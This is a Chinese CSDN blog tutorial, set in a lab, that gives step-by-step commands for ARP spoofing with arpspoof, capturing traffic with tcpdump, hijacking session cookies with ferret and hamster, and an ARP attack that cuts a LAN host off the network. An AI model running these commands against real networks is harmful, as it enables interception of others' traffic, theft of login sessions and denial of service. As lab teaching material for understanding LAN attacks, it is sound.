ARP欺骗攻击和会话劫持和断网攻击

  ARP欺骗攻击有很多很多的工具可用,可以达到的目的相应的也有很多。我会根据实现攻击相应的更新一些工具的使用。

arpspoof命令格式:

arpspoof -i 网卡 -t 目标 host

欺骗攻击:

   kali : 192.168.46.136

  win7 : 192.168.46.137

  网管 :192.168.46.2

开启ip转发:

echo 1 >> /proc/sys/net/ipv4/ip_forward
可以用cat查看是否成功。

重定向受害者者的流量传给攻击者:

arpspoof -i eth0 -t 192.168.46.137 192.168.46.2

tcpdump抓包(使用wireshark也可以)

因为网关具有路由功能,因此只要监听本地网卡流量就能得到目标主机的流量。

简单用法: tcpdump -w cookie.cap  #抓取所有流量写入cookie.cap


进行一段时间的欺骗,期间可以随便浏览些网页,聊天之类的,比如现在访问数字杭电,一段时间后停止欺骗、停止抓包,并配合使用ferret处理抓取的流量。

简单用法: ferret -r cookie.cap  #处理抓取的流量


确保cookie.cap在root根目录下后,终端输入hamster。

接着给浏览器设置代理。ip为 127.0.0.1 端口为 1234.

设置完就可以通过访问127.0.0.1:1234或者hamster来查看劫持的数据了


ARP断网攻击:

实现起来非常简单,记得关闭本地ip转发:echo 0 >> /proc/sys/net/ipv4/ip_forward

ifconfig–查看网卡信息

fping  -asg 192.168.46.1/24  -查询局域网连接的IP

arpspoof  -i eth0 –t 目标IP     自己的网关  192.168.46.2



©️2020 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值